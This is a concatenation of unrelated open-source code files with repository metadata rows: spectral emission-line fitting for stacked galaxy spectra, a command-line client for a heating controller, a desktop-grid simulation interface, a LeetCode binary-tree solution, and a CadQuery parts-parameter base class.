self.flLineSpectrum=n.array([self.stack(xx)-self.model(xx) for xx in self.wlLineSpectrum])
self.fl_frac_LineSpectrum=n.array([self.stack(xx)/self.model(xx) for xx in self.wlLineSpectrum])
self.flErrLineSpectrum=self.stackErr(self.wlLineSpectrum)
else:
wlA,flA,flErrA = self.hdu1.data['wavelength'], self.hdu1.data['meanWeightedStack'], self.hdu1.data['jackknifStackErrors']
self.selection = (flA>0) & (self.hdu1.data['NspectraPerPixel'] > float( self.stack_file.split('_')[-5]) * self.N_spectra_limitFraction )
self.wl,self.fl,self.flErr = wlA[self.selection], flA[self.selection], flErrA[self.selection]
self.stack=interp1d(self.wl,self.fl)
self.stackErr=interp1d(self.wl,self.flErr)
# loads model :
hdus = fits.open(self.stack_model_file)
self.hdu2 = hdus[1] # .data
self.wlModel,self.flModel = self.hdu2.data['wavelength'], self.hdu2.data['firefly_model']*10**(-17)
self.model=interp1d(n.hstack((self.wlModel,[n.max(self.wlModel)+10,11000])), n.hstack(( self.flModel, [n.median(self.flModel[:-20]),n.median(self.flModel[:-20])] )) )
# wavelength range common to the stack and the model :
self.wlLineSpectrum = n.arange(n.max([self.stack.x.min(),self.model.x.min()]), n.min([self.stack.x.max(),self.model.x.max()]), 0.5)[2:-1]
self.flLineSpectrum=n.array([self.stack(xx)-self.model(xx) for xx in self.wlLineSpectrum])
self.fl_frac_LineSpectrum=n.array([self.stack(xx)/self.model(xx) for xx in self.wlLineSpectrum])
self.flErrLineSpectrum=self.stackErr(self.wlLineSpectrum)
def interpolate_stack(self):
"""
		Divides the measured stack into parts that overlap and parts that do not overlap with the model.
"""
self.stack=interp1d(self.wl,self.fl)
self.stackErr=interp1d(self.wl,self.flErr)
# bluer than model
self.stBlue = (self.wl<=self.firefly_min_wavelength)
# optical
self.stOpt = (self.wl<self.firefly_max_wavelength)& (self.wl> self.firefly_min_wavelength)
# redder than model
self.stRed = (self.wl>=self.firefly_max_wavelength)
if len(self.wl)<50 :
print "no data, skips spectrum"
return 0.
if len(self.wl[self.stBlue])>0:
self.contBlue=n.median(self.fl[self.stBlue])
self.side='blue'
if len(self.wl[self.stRed])>0:
self.contRed=n.median(self.fl[self.stRed])
self.side='red'
if len(self.wl[self.stRed])>0 and len(self.wl[self.stBlue])>0:
self.contRed=n.median(self.fl[self.stRed])
self.contBlue=n.median(self.fl[self.stBlue])
self.side='both'
if len(self.wl[self.stRed])==0 and len(self.wl[self.stBlue])==0:
self.side='none'
def interpolate_model(self):
"""
Interpolates the model to an array with the same coverage as the stack.
"""
# overlap region with stack
print "interpolate model"
self.mdOK =(self.wlModel>n.min(self.wl))&(self.wlModel<n.max(self.wl))
mdBlue=(self.wlModel<=n.min(self.wl)) # bluer part than data
mdRed=(self.wlModel>=n.max(self.wl)) # redder part than data
okRed=(self.wlModel>4650)&(self.wlModel<self.firefly_max_wavelength)
# Correction model => stack
CORRection=n.sum((self.wl[self.stOpt][1:]-self.wl[self.stOpt][:-1])* self.fl[self.stOpt][1:]) / n.sum((self.wlModel[ self.mdOK ][1:]-self.wlModel[ self.mdOK ][:-1])* self.flModel [ self.mdOK ][1:])
print "Correction", CORRection
if self.side=='red':
			self.model=interp1d(n.hstack((self.wlModel[ self.mdOK ],n.arange(self.wlModel[ self.mdOK ].max()+0.5, self.stack.x.max(), 0.5))), n.hstack(( self.flModel [ self.mdOK ]*CORRection, n.ones_like(n.arange( self.wlModel[ self.mdOK ].max() + 0.5, self.stack.x.max(), 0.5))*self.contRed )) )
		elif self.side=='blue':
			self.model=interp1d(n.hstack((n.arange(self.stack.x.min(),self.wlModel[ self.mdOK ].min()-1., 0.5),self.wlModel[ self.mdOK ])),n.hstack(( n.ones_like(n.arange(self.stack.x.min() ,self.wlModel[ self.mdOK ].min() -1.,0.5))* self.contBlue, self.flModel [ self.mdOK ]*CORRection )) )
		elif self.side=='both':
			x1=n.hstack((n.arange(self.stack.x.min(),self.wlModel[ self.mdOK ].min()-1., 0.5), self.wlModel[ self.mdOK ]))
			y1=n.hstack(( n.ones_like(n.arange(self.stack.x.min(),self.wlModel[ self.mdOK ].min()- 1.,0.5))*self.contBlue, self.flModel [ self.mdOK ]*CORRection ))
			x2=n.hstack((x1,n.arange(self.wlModel[ self.mdOK ].max()+0.5,self.stack.x.max(),0.5)))
			y2=n.hstack((y1,n.ones_like(n.arange(self.wlModel[ self.mdOK ].max()+0.5, self.stack.x.max(), 0.5))*self.contRed ))
self.model=interp1d(x2,y2)
elif self.side=='none':
self.model=interp1d(self.wlModel[ self.mdOK ], self.flModel [ self.mdOK ])
def subtract_continuum_model(self):
"""
		Creates the continuum-subtracted spectrum: the 'line' spectrum.
"""
self.interpolate_stack()
self.interpolate_model()
# wavelength range common to the stack and the model :
self.wlLineSpectrum = n.arange(n.max([self.stack.x.min(),self.model.x.min()]), n.min([self.stack.x.max(),self.model.x.max()]), 0.5)[2:-1]
print "range probed", self.wlLineSpectrum[0], self.wlLineSpectrum[-1], len( self.wlLineSpectrum)
self.flLineSpectrum=n.array([self.stack(xx)-self.model(xx) for xx in self.wlLineSpectrum])
self.flErrLineSpectrum=self.stackErr(self.wlLineSpectrum)
def fit_lines_to_lineSpectrum(self):
"""
Fits the emission lines on the line spectrum.
"""
# interpolates the mean spectra.
print "fits to the line spectrum"
lfit = lineFit.LineFittingLibrary()
#self.subtract_continuum_model()
data,h=[],[]
print O2_3727
dat_mean,mI,hI=lfit.fit_Line_OIIdoublet_position(self.wlLineSpectrum, self.flLineSpectrum, self.flErrLineSpectrum, a0= O2_3727 , lineName="O2_3728", p0_sigma=7,model="gaussian",fitWidth = 20.,DLC=10.)
print hI, dat_mean
d_out=[]
for kk in range(10):
fluxRR = interp1d(self.wl, self.hdu1.data['jackknifeSpectra'].T[kk][self.selection])
flLineSpectrumRR=n.array([fluxRR(xx)-self.model(xx) for xx in self.wlLineSpectrum])
d1,mI,hI=lfit.fit_Line_OIIdoublet_position(self.wlLineSpectrum, flLineSpectrumRR, self.flErrLineSpectrum, a0= O2_3727 , lineName="O2_3728", p0_sigma=7,model="gaussian",fitWidth = 20.,DLC=10.)
d_out.append(d1)
d_out = n.array(d_out)
#print "jk out", d_out
err_out = n.std(d_out,axis=0)
#print "before", err_out, dat_mean
# assign error values :
dat_mean[3] = err_out[3-1]
dat_mean[5] = err_out[5-1]
dat_mean[7] = err_out[7-1]
#print "after", dat_mean
data.append(dat_mean)
h.append(hI)
for li in allLinesList :
# measure line properties from the mean weighted stack
print li[2]
dat_mean,mI,hI=lfit.fit_Line_position_C0noise(self.wlLineSpectrum, self.flLineSpectrum, self.flErrLineSpectrum, li[1], lineName=li[2], continuumSide=li[3], model="gaussian", p0_sigma=7,fitWidth = 15.,DLC=10.)
print hI, dat_mean
# measure its dispersion using the stacks
d_out=[]
for kk in range(len(self.hdu1.data['jackknifeSpectra'].T)):
fluxRR = interp1d(self.wl, self.hdu1.data['jackknifeSpectra'].T[kk][self.selection])
flLineSpectrumRR=n.array([fluxRR(xx)-self.model(xx) for xx in self.wlLineSpectrum])
d1,mI,hI=lfit.fit_Line_position_C0noise(self.wlLineSpectrum, flLineSpectrumRR, self.flErrLineSpectrum, li[1], lineName=li[2], continuumSide=li[3], model="gaussian", p0_sigma=7,fitWidth = 15.,DLC=10.)
d_out.append(d1)
d_out = n.array(d_out)
err_out = n.std(d_out,axis=0)
# assign error values :
dat_mean[2] = err_out[2-1]
dat_mean[4] = err_out[4-1]
dat_mean[6] = err_out[6-1]
data.append(dat_mean)
h.append(hI)
heading="".join(h)
out=n.hstack((data))
#print "out", out
out[n.isnan(out)]=n.ones_like(out[n.isnan(out)])*self.dV
#output = n.array([ out ])
#print "----------------", output.T[0], output.T[1], output
colNames = heading.split()
#print colNames
col0 = fits.Column(name=colNames[0],format='D', array= n.array([out.T[0]]))
col1 = fits.Column(name=colNames[1],format='D', array= n.array([out.T[1]]))
self.lineSpec_cols = fits.ColDefs([col0, col1])
#print self.lineSpec_cols
#print colNames
for ll in range(2,len(colNames),1):
#self.hdR["HIERARCH "+colNames[ll]+"_nc"] = out.T[ll]
self.lineSpec_cols += fits.Column(name=colNames[ll], format='D', array= n.array([out.T[ll]]) )
#print self.lineSpec_cols
self.lineSpec_tb_hdu = fits.BinTableHDU.from_columns(self.lineSpec_cols)
def fit_lines_to_fullSpectrum(self):
"""
Fits the emission lines on the line spectrum.
"""
# interpolates the mean spectra.
print "fits to full spectrum"
lfit = lineFit.LineFittingLibrary()
data,h=[],[]
print O2_3727
dat_mean,mI,hI=lfit.fit_Line_OIIdoublet_position(self.wl, self.fl, self.flErr, a0= O2_3727 , lineName="O2_3728", p0_sigma=7,model="gaussian",fitWidth = 20.,DLC=10.)
print hI, dat_mean
d_out=[]
for kk in range(10):
d1,mI,hI=lfit.fit_Line_OIIdoublet_position(self.wl, self.hdu1.data['jackknifeSpectra'].T[kk][self.selection], self.flErr , a0= O2_3727 , lineName="O2_3728", p0_sigma=7,model="gaussian",fitWidth = 20.,DLC=10.)
d_out.append(d1)
d_out = n.array(d_out)
#print "jk out", d_out
err_out = n.std(d_out,axis=0)
#print "before", err_out, dat_mean
# assign error values :
dat_mean[3] = err_out[3-1]
dat_mean[5] = err_out[5-1]
dat_mean[7] = err_out[7-1]
#print "after", dat_mean
data.append(dat_mean)
h.append(hI)
for li in allLinesList :
print li[2]
# measure line properties from the mean weighted stack
dat_mean,mI,hI=lfit.fit_Line_position_C0noise(self.wl, self.fl, self.flErr, li[1], lineName=li[2], continuumSide=li[3], model="gaussian", p0_sigma=7,fitWidth = 15.,DLC=10.)
print hI, dat_mean
# measure its dispersion using the stacks
d_out=[]
for kk in range(len(self.hdu1.data['jackknifeSpectra'].T)):
d1,mI,hI=lfit.fit_Line_position_C0noise(self.wl, self.hdu1.data['jackknifeSpectra'].T[kk][self.selection], self.flErr, li[1], lineName=li[2], continuumSide=li[3], model="gaussian", p0_sigma=7,fitWidth = 15.,DLC=10.)
d_out.append(d1)
d_out = n.array(d_out)
err_out = n.std(d_out,axis=0)
# assign error values :
dat_mean[2] = err_out[2-1]
dat_mean[4] = err_out[4-1]
dat_mean[6] = err_out[6-1]
data.append(dat_mean)
#print li[2], dat_mean
h.append(hI)
heading="".join(h)
out=n.hstack((data))
out[n.isnan(out)]=n.ones_like(out[n.isnan(out)])*self.dV
#output = n.array([ out ])
#print "----------------", output.T[0], output.T[1], output
colNames = heading.split()
#print colNames
col0 = fits.Column(name=colNames[0],format='D', array= n.array([out.T[0]]))
col1 = fits.Column(name=colNames[1],format='D', array= n.array([out.T[1]]))
self.fullSpec_cols = fits.ColDefs([col0, col1])
#print colNames
for ll in range(2,len(colNames),1):
#self.hdR["HIERARCH "+colNames[ll]+"_nc"] = out.T[ll]
self.fullSpec_cols += fits.Column(name=colNames[ll], format='D', array= n.array([out.T[ll]]) )
self.fullSpec_tb_hdu = fits.BinTableHDU.from_columns(self.fullSpec_cols)
def fit_lines_to_lineSpectrum_tutorial(self):
"""
Fits the emission lines on the line spectrum.
"""
# interpolates the mean spectra.
print "fits to the line spectrum"
lfit = lineFit.LineFittingLibrary()
#self.subtract_continuum_model()
data,h=[],[]
print O2_3727
dat_mean,mI,hI=lfit.fit_Line_OIIdoublet_position(self.wlLineSpectrum, self.flLineSpectrum, self.flErrLineSpectrum, a0= O2_3727 , lineName="O2_3728", p0_sigma=7,model="gaussian",fitWidth = 20.,DLC=10.)
data.append(dat_mean)
h.append(hI)
for li in allLinesList :
# measure line properties from the mean weighted stack
print li[2]
dat_mean,mI,hI=lfit.fit_Line_position_C0noise(self.wlLineSpectrum, self.flLineSpectrum, self.flErrLineSpectrum, li[1], lineName=li[2], continuumSide=li[3], model="gaussian", p0_sigma=7,fitWidth = 15.,DLC=10.)
data.append(dat_mean)
h.append(hI)
heading="".join(h)
out=n.hstack((data))
#print "out", out
out[n.isnan(out)]=n.ones_like(out[n.isnan(out)])*self.dV
#output = n.array([ out ])
#print "----------------", output.T[0], output.T[1], output
colNames = heading.split()
#print colNames
col0 = fits.Column(name=colNames[0],format='D', array= n.array([out.T[0]]))
col1 = fits.Column(name=colNames[1],format='D', array= n.array([out.T[1]]))
self.lineSpec_cols = fits.ColDefs([col0, col1])
#print self.lineSpec_cols
#print colNames
for ll in range(2,len(colNames),1):
#self.hdR["HIERARCH "+colNames[ll]+"_nc"] = out.T[ll]
self.lineSpec_cols += fits.Column(name=colNames[ll], format='D', array= n.array([out.T[ll]]) )
#print self.lineSpec_cols
self.lineSpec_tb_hdu = fits.BinTableHDU.from_columns(self.lineSpec_cols)
def fit_lines_to_fullSpectrum_tutorial(self):
"""
Fits the emission lines on the line spectrum.
"""
# interpolates the mean spectra.
print "fits to full spectrum"
lfit = lineFit.LineFittingLibrary()
data,h=[],[]
print O2_3727
dat_mean,mI,hI=lfit.fit_Line_OIIdoublet_position(self.wl, self.fl, self.flErr, a0= O2_3727 , lineName="O2_3728", p0_sigma=7,model="gaussian",fitWidth = 20.,DLC=10.)
print hI, dat_mean
data.append(dat_mean)
h.append(hI)
for li in allLinesList :
print li[2]
# measure line properties from the mean weighted stack
dat_mean,mI,hI=lfit.fit_Line_position_C0noise(self.wl, self.fl, self.flErr, li[1], lineName=li[2], continuumSide=li[3], model="gaussian", p0_sigma=7,fitWidth = 15.,DLC=10.)
print hI, dat_mean
# measure its dispersion using the stacks
data.append(dat_mean)
#print li[2], dat_mean
h.append(hI)
heading="".join(h)
out=n.hstack((data))
out[n.isnan(out)]=n.ones_like(out[n.isnan(out)])*self.dV
#output = n.array([ out ])
#print "----------------", output.T[0], output.T[1], output
colNames = heading.split()
#print colNames
col0 = fits.Column(name=colNames[0],format='D', array= n.array([out.T[0]]))
col1 = fits.Column(name=colNames[1],format='D', array= n.array([out.T[1]]))
self.fullSpec_cols = fits.ColDefs([col0, col1])
#print colNames
for ll in range(2,len(colNames),1):
#self.hdR["HIERARCH "+colNames[ll]+"_nc"] = out.T[ll]
self.fullSpec_cols += fits.Column(name=colNames[ll], format='D', array= n.array([out.T[ll]]) )
self.fullSpec_tb_hdu = fits.BinTableHDU.from_columns(self.fullSpec_cols)
def save_spectrum(self):
"""
Saves the stack spectrum, the model and derived quantities in a single fits file with different hdus.
"""
wavelength = fits.Column(name="wavelength",format="D", unit="Angstrom", array= self.wlLineSpectrum)
flux = fits.Column(name="flux",format="D", unit="Angstrom", array= self.flLineSpectrum)
fluxErr = fits.Column(name="fluxErr",format="D", unit="Angstrom", array= self.flErrLineSpectrum)
# new columns
cols = fits.ColDefs([wavelength, flux, fluxErr])
lineSptbhdu = fits.BinTableHDU.from_columns(cols)
# previous file
prihdu = fits.PrimaryHDU(header=self.hdR)
thdulist = fits.HDUList([prihdu, self.hdu1, self.hdu2, lineSptbhdu, self.lineSpec_tb_hdu, self.fullSpec_tb_hdu])
outPutFileName = self.stack_model_file
outFile = n.core.defchararray.replace(outPutFileName, "fits", "model").item()
if self.tutorial:
outFile = join( os.environ['DATA_DIR'], "ELG-composite", self.stack_file_base[:-5]+".model" )
if self.eboss_stack:
#outFile = join(os.environ['DATA_DIR'],"ELG-composite", "stacks", "model", self.stack_file_base[:-6] + ".model.fits")
outFile = join(os.environ['EBOSS_TARGET'],"elg", "tests", "stacks", "model", self.stack_file_base[:-6] + ".model")
if os.path.isfile(outFile):
os.remove(outFile)
thdulist.writeto(outFile)
| cc0-1.0 | 5,811,073,617,534,907,000 | 43.384615 | 316 | 0.68462 | false | 2.521627 | false | false | false |
motoz/nbetest | client.py | 1 | 3133 | #! /usr/bin/python
# -*- coding: utf-8 -*-
"""
Copyright (C) 2013 Anders Nylund
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from __future__ import print_function
from argparse import ArgumentParser
from protocol import Proxy
PORT = 8483 # Controller port
PASSWORD = '0123456789'
def getfunc(args, proxy):
l = proxy.get(args.path)
print('\n'.join(l))
def setfunc(args, proxy):
l = proxy.set(args.path, args.value)
print('\n'.join(l))
def rawfunc(args, proxy):
response = proxy.make_request(int(args.function), args.payload)
if args.verbose:
print('response from:', proxy.addr)
print('IP:', proxy.ip, 'Serial', proxy.serial)
print('received: ' + (response.framedata[1:-1]).decode('ascii'))
print(' status: %d'%response.status)
print(' function: %d'%response.function)
print(' payload:\n ' + '\n '.join(response.payload.split(';')))
else:
print('\n'.join(response.payload.split(';')))
if __name__ == '__main__':
argparser = ArgumentParser()
argparser.add_argument('-v', '--verbose', action='store_true')
argparser.add_argument('-a', '--address', default=None, help='controller address, autodiscovered if omitted')
argparser.add_argument('-p', '--password', default=PASSWORD)
argparser.add_argument('-s', '--serial', default='000000')
subparsers = argparser.add_subparsers(help='sub-command help')
# create the parser for the "raw" command
parser_b = subparsers.add_parser('raw', help='')
parser_b.add_argument('function', help='')
parser_b.add_argument('payload', help='')
parser_b.set_defaults(func=rawfunc)
# create the parser for the "set" command
parser_b = subparsers.add_parser('set', help='write item value')
parser_b.add_argument('path', nargs='?', default = '*', help='path to write')
parser_b.add_argument('value', nargs='?', help='value to write')
parser_b.set_defaults(func=setfunc)
# create the parser for the "get" command
parser_c = subparsers.add_parser('get', help='get all items')
parser_c.add_argument('path', nargs='?', default = '*', help='partial of full path to item')
parser_c.set_defaults(func=getfunc)
args = argparser.parse_args()
if args.address is None:
with Proxy.discover(args.password, PORT, args.serial) as proxy:
args.func(args, proxy)
else:
with Proxy(args.password, PORT, args.address, args.serial) as proxy:
args.func(args, proxy)
| gpl-2.0 | 1,483,653,078,911,860,000 | 35.430233 | 113 | 0.658474 | false | 3.774699 | false | false | false |
auxten/pymw | pymw/interfaces/grid_simulator.py | 2 | 8122 | #!/usr/bin/env python
"""Provide a interface for simulating master worker computing on a desktop grid based on traces.
Thanks to Derrick Kondo for the idea.
"""
__author__ = "Eric Heien <pymw@heien.org>"
__date__ = "2 May 2009"
import errno
import heapq
import array
# TODO: have some sort of wraparound for worker availability intervals,
# or cleanly error out for workers that are no longer available
class SimWorker:
def __init__(self, worker_name, worker_speed, worker_avail_lens, worker_avail_fracs):
self._name = worker_name
self._speed = worker_speed
self._avail_lens = array.ArrayType('f')
self._avail_fracs = array.ArrayType('f')
self._avail_lens.fromlist(worker_avail_lens)
self._avail_fracs.fromlist(worker_avail_fracs)
self._avail_ind = 0
self._cur_time = 0
self._sub_avail_time = 0
self._task_wall_times = []
self._task_cpu_times = []
# TODO: handle going out of bounds on avail array
# Simulates the worker performing cpu_secs
# Returns the actual wall time to complete this
def run_cpu(self, cpu_secs):
self._task_cpu_times.append(cpu_secs)
wall_exec_time = 0
while cpu_secs > 0:
# Calculate the speed of this worker during the interval
worker_int_speed = self._avail_fracs[self._avail_ind] * self._speed
# Determine the remaining length of this interval
int_remaining_secs = self._avail_lens[self._avail_ind] - self._sub_avail_time
# Determine the available CPU seconds in this interval
int_cpu_secs = int_remaining_secs * worker_int_speed
# If we won't finish the task in this interval
if int_cpu_secs < cpu_secs:
# Move to the next interval
wall_exec_time += int_remaining_secs
self._avail_ind += 1
self._sub_avail_time = 0
cpu_secs -= int_cpu_secs
else:
# Move to the middle of this interval
executed_secs = cpu_secs/worker_int_speed
wall_exec_time += executed_secs
self._sub_avail_time += executed_secs
cpu_secs = 0
self._cur_time += wall_exec_time
self._task_wall_times.append(wall_exec_time)
# Advances the wall time of this worker by wall_secs
# If the worker is not available at the new time,
# advances the wall time further until the worker is available
def advance_wall_time(self, wall_secs):
rem_secs = wall_secs
        # Advance the availability interval pointer until we've passed wall_secs
while rem_secs > 0:
int_remaining_secs = self._avail_lens[self._avail_ind] - self._sub_avail_time
if int_remaining_secs < rem_secs:
rem_secs -= int_remaining_secs
self._sub_avail_time = 0
self._avail_ind += 1
else:
self._sub_avail_time += rem_secs
rem_secs = 0
# Advance until we're in an available state
additional_secs = 0
while self._avail_fracs[self._avail_ind] == 0:
additional_secs += self._avail_lens[self._avail_ind] - self._sub_avail_time
self._avail_ind += 1
self._sub_avail_time = 0
# Advance the current simulation time
self._cur_time += wall_secs + additional_secs
# Test if this worker is available at sim_time
def past_sim_time(self, sim_time):
if sim_time >= self._cur_time: return True
else: return False
def __str__(self):
return self._name
def __repr__(self):
return self._name
def __cmp__(self, other):
return self._cur_time - other._cur_time
class GridSimulatorInterface:
def __init__(self, trace_files=[]):
self._cur_sim_time = 0
self._num_executed_tasks = 0
self._worker_list = []
self._waiting_list = []
def add_worker(self, worker):
# Advance the new worker to its first available time
worker.advance_wall_time(0)
# If the new worker isn't available at the start, put it on the waiting list
if not worker.past_sim_time(0):
self._worker_list.append(worker)
else:
heapq.heappush(self._waiting_list, worker)
def generate_workers(self, num_workers, speed_func, avail_func):
for wnum in range(num_workers):
new_worker_speed = speed_func(wnum)
new_worker_avail_lens, new_worker_avail_fracs = avail_func(wnum)
new_worker = SimWorker("W"+str(wnum), new_worker_speed, new_worker_avail_lens, new_worker_avail_fracs)
self.add_worker(new_worker)
def read_workers_from_fta_tab_files(self, event_trace_file, num_workers=None):
if event_trace_file:
worker_dict = {}
event_trace_file.readline() # skip the header line
for line in event_trace_file:
split_line = line.split()
node_id, start_time, stop_time = split_line[2], float(split_line[6]), float(split_line[7])
if node_id not in worker_dict:
if num_workers and len(worker_dict) >= num_workers: break
else: worker_dict[node_id] = []
worker_dict[node_id].append([start_time, stop_time])
            for worker_id in worker_dict:
                avail_lens = []
                avail_fracs = []
                worker_times = worker_dict[worker_id]
                last_interval_end = 0
                for int_time in worker_times:
                    # Gap before this availability interval: the worker is unavailable (fraction 0)
                    gap_length = int_time[0] - last_interval_end
                    if gap_length > 0:
                        avail_lens.append(gap_length)
                        avail_fracs.append(0.0)
                    # The availability interval itself: the worker is fully available (fraction 1)
                    avail_lens.append(int_time[1] - int_time[0])
                    avail_fracs.append(1.0)
                    last_interval_end = int_time[1]
                # Assumption: trace-derived workers run at unit speed; adjust if the trace provides speeds
                self.add_worker(SimWorker(str(worker_id), 1.0, avail_lens, avail_fracs))
# If none of the workers matched the available tasks and there are still workers in the wait queue,
# advance simulation time and tell PyMW to try again
def try_avail_check_again(self):
if len(self._waiting_list) == 0:
return False
self._cur_sim_time = self._waiting_list[0]._cur_time
return True
def get_available_workers(self):
# Pop workers off the sorted waiting list until cur_sim_time
while len(self._waiting_list) > 0 and self._waiting_list[0].past_sim_time(self._cur_sim_time):
self._worker_list.append(heapq.heappop(self._waiting_list))
return self._worker_list
def reserve_worker(self, worker):
self._worker_list.remove(worker)
def worker_finished(self, worker):
heapq.heappush(self._waiting_list, worker)
def execute_task(self, task, worker):
if not worker:
raise Exception("Cannot use NULL worker")
# Get the CPU seconds for the specified task and worker
task_exec_time = task._raw_exec(worker)
# Run the worker for task_exec_time CPU seconds
worker.run_cpu(task_exec_time)
self._num_executed_tasks += 1
task.task_finished(None) # notify the task
# Compute statistics (mean, median, stddev) on values in the array
def compute_stats(self, times):
times.sort()
total_time = 0
for x in times: total_time += x
mean_time = total_time / len(times)
median_time = times[len(times)/2]
stddev_time = 0
for time_n in times:
stddev_time += pow(mean_time - time_n, 2)
stddev_time = pow(stddev_time/len(times), 0.5)
return total_time, mean_time, median_time, stddev_time
def get_status(self):
wall_times = []
cpu_times = []
for worker in self._worker_list:
wall_times.extend(worker._task_wall_times)
cpu_times.extend(worker._task_cpu_times)
for worker in self._waiting_list:
wall_times.extend(worker._task_wall_times)
cpu_times.extend(worker._task_cpu_times)
if len(wall_times) > 0:
total_wall_time, mean_wall_time, median_wall_time, stddev_wall_time = self.compute_stats(wall_times)
total_cpu_time, mean_cpu_time, median_cpu_time, stddev_cpu_time = self.compute_stats(cpu_times)
else:
total_wall_time = mean_wall_time = median_wall_time = stddev_wall_time = 0
total_cpu_time = mean_cpu_time = median_cpu_time = stddev_cpu_time = 0
worker_sim_times = [worker._cur_time for worker in self._worker_list]
worker_sim_times.append(0)
cur_sim_time = max(worker_sim_times)
num_workers = len(self._worker_list) + len(self._waiting_list)
return {"num_total_workers" : num_workers, "num_executed_tasks" : self._num_executed_tasks,
"cur_sim_time": cur_sim_time,
"total_wall_time": total_wall_time, "mean_wall_time": mean_wall_time,
"median_wall_time": median_wall_time, "stddev_wall_time": stddev_wall_time,
"total_cpu_time": total_cpu_time, "mean_cpu_time": mean_cpu_time,
"median_cpu_time": median_cpu_time, "stddev_cpu_time": stddev_cpu_time,
}
def pymw_master_read(self, loc):
return None, None, None
def pymw_master_write(self, output, loc):
return None
def pymw_worker_read(loc):
return None
def pymw_worker_write(output, loc):
return None
def pymw_worker_func(func_name_to_call):
return None
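# Illustrative usage sketch (not part of the original module): build a small simulated grid with
# hypothetical speed and availability callbacks, then print its initial status.
if __name__ == '__main__':
    sim = GridSimulatorInterface()
    # 4 unit-speed workers, each alternating 1 hour available / 1 hour unavailable over 24 hours
    sim.generate_workers(4, lambda wnum: 1.0,
                         lambda wnum: ([3600.0] * 24, [1.0, 0.0] * 12))
    print(sim.get_status())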
| mit | -6,526,020,610,318,547,000 | 33.709402 | 105 | 0.691455 | false | 3.008148 | false | false | false |
weixsong/algorithm | leetcode/199.py | 1 | 1052 | # -*- encoding: utf-8 -*-
'''
Given a binary tree, imagine yourself standing on the right side of it, return the values of the nodes you can see ordered from top to bottom.
For example:
Given the following binary tree,
1 <---
/ \
2 3 <---
\ \
5 4 <---
You should return [1, 3, 4].
'''
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def rightSideView(self, root):
"""
:type root: TreeNode
:rtype: List[int]
"""
if root == None:
return []
res = []
q = [root]
while len(q) != 0:
res.append(q[len(q) - 1].val)
temp = []
for item in q:
if item.left != None:
temp.append(item.left)
if item.right != None:
temp.append(item.right)
q = temp
return res
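# --- Hedged usage sketch (added for illustration, not part of the LeetCode
# submission). It defines a local TreeNode because LeetCode normally supplies it,
# and rebuilds the tree from the docstring example above.
if __name__ == '__main__':
    class TreeNode(object):
        def __init__(self, x):
            self.val = x
            self.left = None
            self.right = None

    root = TreeNode(1)
    root.left, root.right = TreeNode(2), TreeNode(3)
    root.left.right, root.right.right = TreeNode(5), TreeNode(4)
    print(Solution().rightSideView(root))  # expected: [1, 3, 4]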
| mit | 819,643,236,911,964,000 | 21.869565 | 142 | 0.469582 | false | 3.757143 | false | false | false |
easyw/kicad-3d-models-in-freecad | cadquery/FCAD_script_generator/Conn_PinSocket/cq_base_parameters.py | 4 | 8672 | # -*- coding: utf8 -*-
#!/usr/bin/python
#
#****************************************************************************
#* *
#* base classes for generating part models in STEP AP214 *
#* *
#* This is part of FreeCAD & cadquery tools *
#* to export generated models in STEP & VRML format. *
#* Copyright (c) 2017 *
#* Terje Io https://github.com/terjeio *
#* Maurice https://launchpad.net/~easyw *
#* *
#* All trademarks within this guide belong to their legitimate owners. *
#* *
#* This program is free software; you can redistribute it and/or modify *
#* it under the terms of the GNU Lesser General Public License (LGPL) *
#* the License, or (at your option) any later version. *
#* for detail see the LICENCE text file. *
#* *
#* This program is distributed in the hope that it will be useful, *
#* but WITHOUT ANY WARRANTY; without even the implied warranty of *
#* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
#* GNU Library General Public License for more details. *
#* *
#* You should have received a copy of the GNU Library General Public *
#* License along with this program; if not, write to the Free Software *
#* Foundation, Inc., *
#* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA *
#* *
#****************************************************************************
# 2017-11-25
#
# parts of this code is based on work by other contributors
#
from collections import namedtuple
### use enums (Phyton 3+)
class CaseType:
r"""A class for holding constants for part types
.. note:: will be changed to enum when Python version allows it
"""
THT = 'THT'
r"""THT - trough hole part
"""
SMD = 'SMD'
r"""SMD - surface mounted part
"""
class PinStyle:
r"""A class for holding constants for pin styles
.. note:: will be changed to enum when Python version allows it
"""
STRAIGHT = 'Straight'
ANGLED = 'Angled'
###
#
# The following classes must be subclassed
#
class PartParametersBase:
"""
.. document private functions
.. automethod:: _make_params
"""
Model = namedtuple("Model", [
'variant', # generic model name
'params', # parameters
'model' # model creator class
])
""" Internally used for passing information from the base parameters to the class instance used for creating models
.. py:attribute:: variant
The generic name from the list of parameters
.. py:attribute:: params
The final parameters passed to the class instance
.. py:attribute:: model
The class instance itself
"""
Params = namedtuple("Params", [
'num_pins',
'pin_pitch',
'pin_style',
'type'
])
""" Basic parameters for parts, if further parameters are required this should be subclassed/overriden
.. note:: The existing parameters should be kept with the same name when overriden as the framework requires them
.. py:attribute:: num_pins
Number of pins, for parts with this is usually set to None for
.. py:attribute:: pin_pitch
The final parameters passed to the class instance
.. py:attribute:: pin_style
The class instance itself
.. py:attribute:: type
The class instance itself
"""
def __init__(self):
self.base_params = {}
def _make_params(self, pin_pitch, num_pin_rows, pin_style, type):
r"""add a list of new points
"""
return self.Params(
num_pins = None, # to be added programmatically
pin_pitch = pin_pitch, # pin pitch
pin_style = pin_style, # pin style: 'Straight' or 'Angled'
type = type # part type: 'THT' or 'SMD'
)
def getAllModels(self, model_classes):
r"""Generate model parameters for all series and variants
Loops through all base parameters and model classes instantiating the classes and checks whether a variant should be made.
If a variant is to be made a namedtuple is made with the index from a call to the model instance makeModelName method
and the base parameters are copied to this. When copying the base parameters others may be added such as number of pins (num_pins).
.. note:: Typically this method is overriden in order to add calculated parameters like number of pins.
The model specific parameters are contained in the model class itself.
:param model_classes:
list of part creator classes inherited from :class:`cq_base_model.PartBase`
:type model_classes: ``list of classes``
:rtype: ```tuple````
"""
models = {}
